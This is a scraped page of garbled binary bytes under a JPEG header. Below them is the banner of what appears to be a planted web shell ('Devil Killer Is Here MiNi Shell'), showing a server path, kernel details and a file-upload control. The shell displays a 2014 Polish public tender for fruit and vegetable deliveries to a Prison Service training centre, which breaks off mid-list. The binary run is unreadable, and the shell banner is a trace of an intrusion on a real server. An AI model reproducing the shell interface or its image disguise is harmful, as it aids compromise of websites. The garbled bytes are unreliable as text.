JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140408/120084-N-2014.html

<p class="kh_header"><b>Popów: Dostawy warzyw i owoców dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie.</b><br>
<b>Numer ogłoszenia: 120084 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Szkolenia Służby Więziennej w Kulach , Kule 2, 42-110 Popów, woj. śląskie, tel. 034 3104030, faks 034 3103653.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ośrodek Szkolenia Służby Więziennej w Kulach.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy warzyw i owoców dla OSSW w Kulach - zadanie nr 1. 1.	Buraki czerwone	03221111-7	1 000	kg  2.	Cebula	03221113-1	 1 000	kg  3.	Czosnek	03221120-3 	1000	Szt.  4.	Kapusta biała głowiasta	03221410-3	1 500	kg 5.	Kapusta czerwona głowiasta	03221410-3	 800	kg  6.	Kapusta pekińska	03221410-3	 700	kg  7.	Koperek natka	03221300-9	 1 000	pęczek 8.	Marchew korzeń	03221112-4	 1 600 kg    9.	Ogórek zielony	03221270-9	 800	kg 10.	Papryka 	03221230-7 	800	kg 11.	Pietruszka korzeń	03221110-0  700	kg 12.	Pietruszka natka	03221300-9	       
1 000	pęczek 13.	Pomidory	03221240-4	1 300	kg 14.	Por zielony	03221110-0	700	kg 15.	Rzodkiewka	03221110-0	1 000	pęczek 16.	Sałata zielona 	03221310-2	1 500	szt. 17.	Seler korzeń	03221110-0	 800	kg 18.	Fasolka szparagowa	03221212-5	 100	kg 19.	Szczypiorek natka	03221300-9	  
1 000	pęczek 20.	Pieczarki	03221260-6	 400	kg 21.	Kapusta włoska głowiasta	03221400-0	 300	kg 22.	Bakłażany - oberżyna	03221200-8	 30	kg 23.	Cukinia	03221250-3 	30	kg 24.	Kabaczek	03221200-8	30	kg 25.	Kalafior	03221420-6	100	szt. 26.	Ziemniaki jadalne	03212100-1	 8 000	kg 27.	Ogórki małosolne	03221270-9	 100	kg 28.	Botwinka	03221300-9	 100	pęczek 29.	Susz grzybowy	15331135-2	 1	kg 30.	Susz owocowy	15332410-1	1	kg 31.	Banany	03222111-4	 
1 000	kg 32.	Cytryny	03222210-8	 700	kg 33.	Jabłka deserowe	03222321-9	 1 300	kg 34.	Kiwi	03222118-3	 200	kg 35.	Mandarynki	03222240-7	 400	kg 36.	Pomarańcze	03222220-1	 700	kg 37.	Winogrona	03222340-8	 100	kg 38.	Grapefruity	03222230-4	 300	kg 39.	Truskawki	03222313-0	 100	kg 40.	Nektarynki	03222332-9	 150	kg 41.	Arbuzy	03222330-5	 200	kg 42.	Gruszki	03222322-6	 500	kg 43.	Brzoskwinia	03222332-9	 100	kg 44.	Czereśnie i wiśnie	03222333-6	 100	kg 45.	Śliwki	03222334-3	 50	kg
2. Przedmiotem zamówienia są dostawy warzyw i owoców dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie - zadanie nr 2 1.	Buraki czerwone	03221111-7	400	kg
2.	Cebula	03221113-1	 600	kg
3.	Czosnek	03221120-3	 400	Szt.
4.	Kapusta biała głowiasta	03221410-3 	600	kg
5.	Kapusta czerwona głowiasta	03221410-3	 600	kg
6.	Kapusta pekińska	03221410-3	 400	kg
7.	Koperek natka	03221300-9	 1 000	Pęczek 
8.	Marchew korzeń	03221112-4	 1 000	kg
9.	Ogórek zielony	03221270-9 	600	kg
10.	Papryka 	03221230-7	 150	kg
11.	Pietruszka korzeń	03221110-0	 300	kg
12.	Pietruszka natka	03221300-9	 1 000	Pęczek 
13.	Pomidory	03221240-4	 700	kg
14.	Por zielony	03221110-0 	500	kg
15.	Rzodkiewka	03221110-0	 100	Pęczek 
16.	Sałata zielona 	03221310-2	 1 500	szt.
17.	Seler korzeń	03221110-0 	600	kg
18.	Fasolka szparagowa	03221212-5 	150	kg
19.	Szczypiorek natka	03221300-9	 1 000	Pęczek 
20.	Pieczarki	03221260-6	 200	kg
21.	Cukinia	03221250-3 	100	kg
22.	Kalafior	03221420-6 	100	szt.
23.	Ziemniaki jadalne	03212100-1	 10 000	kg
24.	Botwinka	03221300-9	 200	Pęczek
25.	Banany	03222111-4	 400	kg
26.	Cytryny	03222210-8 	300	kg
27.	Jabłka deserowe	03222321-9 	400	kg
28.	Jabłka świeże	03222321-9	 600	kg
29.	Mandarynki	03222240-7	 50	kg
30.	Pomarańcze	03222220-1	 50	kg
31.	Winogrona	03222340-8	 50	kg
32.	Truskawki	03222313-0	 100	kg
33.	Nektarynki	03222332-9	 150	kg
34.	Gruszki	03222322-6 	50	kg
35.	Brzoskwinia	03222332-9	 150	kg
36.	Wiśnie	03222333-6	 200	kg
37.	Czereśnie	03222333-6	 200	kg
38	Śliwki	03222334-3	 300	kg

Szczegółowe informacje dotyczące przedmiotu zamówienia znajdują się w załączniku  nr 6 i 6a do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-0, 03.22.11.11-7, 03.22.11.13-1, 03.22.11.20-3, 03.22.14.10-3, 03.22.13.00-9, 03.22.11.12-4, 03.22.12.70-9, 03.22.12.30-7, 03.22.11.10-0, 03.22.12.40-4, 03.22.13.10-2, 03.22.12.12-5, 03.22.12.60-6, 03.22.14.00-0, 03.22.12.00-8, 03.22.12.50-3, 03.22.14.20-6, 03.21.21.00-1, 15.33.24.10-1, 03.22.21.11-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. 2013 poz. 907 z późn. zm.) zwanej dalej ustawą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia wynikającego z art. 22 ust. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany formularz oferty stanowiący załącznik do SIWZ. Wypełniony i podpisany formularz cenowy w zakresie zadań od 1 do 2 stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów, 
Dział Kwatermistrzowski - pokój nr 2 i 3, pawilon Warta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2014 godzina 10:00, miejsce: Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów, 
pokój nr 3 - Sekretariat, pawilon Liswarta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy warzyw i owoców dla OSSW w Kulach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Kod  CPV Polska Norma	Opis przedmiotu zamówienia	J.m.	Ilość 1	Buraki czerwone  kl. I	03221111-7 PN-72/R-75360	Świeże, minimalna średnica 5 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste w workach siatkowych z tworzywa sztucz. do 10 kg.	kg	1 000  2	Cebula 
kl. I	03221113-1 PN-87/R-75357	Świeża, minimalna średnica 4 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta w workach siatkowych z tworzywa sztucz. do 15kg.	kg	1 000 3.	Czosnek kl. I 	03221120-3
PN-R75518:1996	Czosnek świeży, w główkach, bez uszkodzeń średnica 4 cm w woreczkach siatkowych do 1 kg.	szt.	1000 4.	Kapusta biała głowiasta 
kl. I	03221410-3 PN-87/R-75362 Kapusta biała w główkach prawidłowo związanych, świeża, bez uszkodzeń mechanicznych powodujących obniżenie wartości użytkowej, wielkość, kształt i barwa główki charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości, czysta , bez zewnętrznych liści, w workach  siatkowych z tworzywa sztucz. do 25 kg	kg	1 500 5.	Kapusta czerwona głowiasta  kl. I	03221410-3 PN-87/R-75362	Kapusta czerwona w główkach, prawidłowo związanych, czystych bez uszkodzeń mechanicznych, wielkość, kształt i barwa główki charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości, w workach siatkowych z tworzywa sztucz. do 10 kg.	kg	800
6.	Kapusta pekińska kl. I	03221410-3 PN-87/R-7536	 Świeża, czysta, bez uszkodzeń, foliowana, w workach foliowych do 5 kg.	kg	700
7.	Koperek natka kl. I	03221300-9
PN-R/75384: 1997	 Młody, świeży, czysty,  bez zanieczyszczeń, wolny od szkodników i ich pozostałości w pęczkach .o wadze nie mniej niż  20 g.	pęczek 1 000 8.	Marchew korzeń  kl. I 	03221112-4 PN-84/R-75358	Świeża, minim.średnica 2 cm, minimalna długość 12 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta w workach siatkowych z tworzywa sztucznego do 10 kg	kg	
1 600 9.	Ogórek zielony kl. I	03221270-9 PN-R-75358	Owoce całe, świeże, zdrowe, czyste bez uszkodzeń mechanicznych, prawidłowo wybarwione, wielkość, kształt i barwa owocu charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości. Opakowania do 5 kg.	kg	800
10.	Papryka  kl. I	03221230-7 BN 85 9137-36	Owoce papryki czerwonej, żółtej lub zielonej, czysta, jędrna, bez 5uszkodzeń mechanicznych, prawidłowo wybarwiona, wielkość, kształt i barwa owocu charakterystyczna dla danego rodzaju i odmiany, wolne od szkodników i ich pozostałości. Opakowanie do 5 kg	kg	800
11.	Pietruszka korzeń  kl. I	03221110-0 PN-R-75370:1996	Świeża, minim.śr.2 cm, minim. na długość 12 cm, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysta, w workach siatk. z tworz. sztucznego do 5 kg.	kg	700
12.	Pietruszka natka  kl. I	03221300-9 PN-R-75384	Młoda, czysta, świeża, zielona, bez zanieczyszczeń, wolna od szkodników  i ich pozostałości w pęczkach o wadze nie mniej niż 20 g.	pęczek	1 000 13.	Pomidory  kl. I	03221240-4
PN-R-75368	Owoce całe, świeże, jędrne, zdrowe, czyste bez uszkodzeń mechanicznych, wielkość wyrównana odmianowo, barwy i kształtu charakterystycznego dla danej odmiany. Na przekroju maksymalnie mięsisty, prawidłowo wybarwiony, bez pustych komór,  bez zielonej piętki, skorkowacenia, nadmiernego zawilgocenia, szkodników i ich pozostałości. Nie dopuszcza się plam chorobotwórczych i zaparzenia. Opakowanie do 6 kg.   Kl. I	kg	1 300
14.	Por zielony kl. I	03221110-0 PN-R-75521:1996	Świeży, nie obcinany, bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty, w workach siatkowych z tworzywa sztucznego do 5 kg.	kg	700
15.	Rzodkiewka kl. I	03221110-0 PN-72-9137-22	Owoc rzodkiewki cały, świeży, zdrowy, czysty bez uszkodzeń powodujących  obniżenie wartości użytkowej, czysty,  wolny od  szkodników i ich pozostałości nie obcinany w pęczkach po 10 szt.	pęczek	1 000 16.	Sałata zielona  kl. I	03221310-2
PN-R-75360	Świeża, zdrowa, czysta, o soczystych, mięsistych zielonych liściach  bez uszkodzeń powodujących obniżenie wartości użytkowej, wolna od Szkodników i ich pozostałości, minimalna waga główki sałaty nie mniej niż 200g.	Szt.	1 500
17.	Seler korzeń
kl. I	03221110-0 PN-R-75371:1996	Minimalna średnica 5cm,świeży,bez uszkodzeń powodujących obniżenie wartości użytkowej, czysty w workach siatkowych z tworzywa sztucznego do5kg 	kg	800 18.	Fasolka szparagowa
kl. I	03221212-5 PN-77/R-75762	Strąki fasolki szparagowej zielone lub żółte. Fasolka cała ,świeża, zdrowa, bez uszkodzeń powodujących obniżenie wartości użytkowej, wolna od szkodników i ich pozostałości, czysta w workach siatkowych z tworzywa sztucznego do 5 kg.	kg	100
19.	Szczypiorek natka kl. I	03221300-9
PN-R-75391	Młody, czysty, świeży, zielone  cienkie pędy, bez zanieczyszczeń, wolny od szkodników i zanieczyszczeń w pęczkach o wadze nie mniej niż 20 g.	pęczek	1 000
20.	Pieczarki
kl. I	03221260-6	Świeże, duże, zdrowe, w Kl. I    
bez uszkodzeń powodujących obniżenie wartości użytkowej, czyste, w skrzyneczkach plastikowych do 5 kg	kg	400
21.	Kapusta włoska głowiasta 
kl. I	03221400-0
PN-87-R-75362	Kapusta w główkach prawidłowo związanych, świeża bez uszkodzeń mech. wielkość, kształt i barwa główki charakterystyczna dla danej odmiany, wolna od szkodników i ich pozostałości. 	kg	300
22.	Bakłażany - oberżyna 
kl. I	03221200-8	Owoc bakłażana owalny o fioletowej barwie, zdrowy, jędrny, czysty, bez uszkodzeń powodujących obniżenie wartości użytkowej 	kg	30
23.	Cukinia 
kl. I	03221250-3	Owoc cukini zbliżony kształtem do ogórków, zdrowy, młody o długości 10-20 cm o delikatnej skórce.	kg	30
24.	Kabaczek 
kl. I	03221200-8	Kabaczek w pełni wyrośnięty, zdrowy, jędrny,  bez uszkodzeń powodujących obniżenie wartości użytkowej.	kg	30
25.	Kalafior 
kl. I	03221420-6
PN-72-R-75361	Kalafior w główkach, świeży, duży, bez uszkodzeń mechanicznych powodujących obniżenie wartości użytkowej, czysty wolny od szkodników i ich pozostałości, wielkość, kształt i barwa główki charakterystyczna dla danego rodzaju i odmiany, bez zewnętrznych liści .	Szt.	100
26.	Ziemniaki jadalne 
kl. I	03212100-1
PN-75/R-74450	Ziemniaki jadalne, zebrane po osiągnięciu pełnej dojrzałości o skórce skorkowaciałej, średnica ziemniaka minimum 5 cm, o świeżym wyglądzie, właściwym kształcie, zapachu, bez zanieczyszczeń, w jednej z  następujących odmian:  Orlik, Irga, Bryza, Anatol, w workach polietylenowych siatkowych, zamkniętych węzłem lub zawiązanych sznurkiem do 30 kg	kg	8 000
27	Ogórki małosolne	03221270-9	Ogórki poddane procesowi kiszenia w okresie 3-5 dni od zakiszenia w wiaderkach plastikowych  do 3 kg	kg	100
28	Botwinka	03221300-9	Buraki czerwone  z liśćmi i łodygami. Czyste, świeże, zdrowe bez zanieczyszczeń i uszkodzeń powodujących obniżenie wartości użytkowej, wolne od szkodników ,pakowany w pęczki po 10 szt. (1 pęczek nie mniej niż 0,5 kg.)	pęczek	100
29	Susz grzybowy	15331135-2
PN-89/A-78510	Borowik suszony. op.jedn. 400-500g	kg	1
30	Susz owocowy	15332410-1	Owoce kilku gatunków pozbawione częściowo zawart. wody. Op. jedn 400-500g	kg	1
31	Banany 
kl. I	03222111-4
PN-R-75514	Całe, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych, szkodników i ich pozostałości.	kg	1 000
32	Cytryny 
kl. I	03222210-8
PN-ISO3631:1999	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, praktycznie wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników i ich pozostałości oraz nadmiernego zawilgocenia powierzchniowego. Barwa powinna być właściwa dla danej odmiany	kg	700
33	Jabłka deserowe 
kl. I	03222321-9
PN-R-75521	Jabłka świeże, przeznaczone do obrotu i spożycia min. i pow. 65 mm. Owoce jednolite odmianowo i wielkością w partii, dojrzałe, bez zmian chorobowych, zdrowe, jędrne, czyste, nie uszkodzone mechaniczne, z szypułką, bez uszkodzeń skórki i miąższu, czyste	kg	1 300
34	Kiwi
kl. I	03222118-3
PN-R-75546	Całe ale bez szypułki, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych oraz szkodników. Owoc musi być odpowiednio jędrny, nie dopuszcza się owoców miękkich, zwiędniętych lub wodnistych, musi być prawidłowo wykształcony i bez nadmiernego zawilgocenia powierzchniowego.	kg	200
35	Mandarynki 
kl. I	03222240-7
PN-R-75514	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników i ich pozostałości oraz nadmiernego zawilgocenia powierzchniowego. Barwa powinna być właściwa dla danej odmiany na przynajmniej jednej trzeciej powierzchni.	kg	400
36	Pomarańcze
kl. I	03222220-1
PN-84/R-75024	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, czyste, wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników i ich pozostałości oraz nadmiernego zawilgocenia powierzchniowego. Barwa powinna być typowa dla danej odmiany.	kg	700
37	Winogrona
kl. I	03222340-8
PN-R-75519	Kiście i jagody winogron powinny być: zdrowe, nie dopuszcza się owoców z objawami zepsucia, czyste, praktycznie wolne od jakichkolwiek widocznych zanieczyszczeń obcych, wolne od szkodników, wolne od uszkodzeń spowodowanych przez szkodniki, wolne od nadmiernego zawilgocenia powierzchniowego. Jagody winogron powinny być całe, dobrze rozwinięte, prawidłowo wykształcone. Powinny mieć kształt, stopień rozwoju i barwę charakterystyczne dla danej odmiany.	kg	100
38	Grapefruity
kl. I	03222230-4	Całe, wolne od odgnieceń, zdrowe, nie dopuszcza się owoców z objawami gnicia lub zepsucia, które czynią je niezdatnymi do spożycia, wolne od jakichkolwiek zanieczyszczeń obcych, wolne od szkodników, wolne od oznak wewnętrznego wysychania, wolne od nadmiernego zawilgocenia powierzchniowego.	kg	300
39	Truskawki kl. I	03222313-0
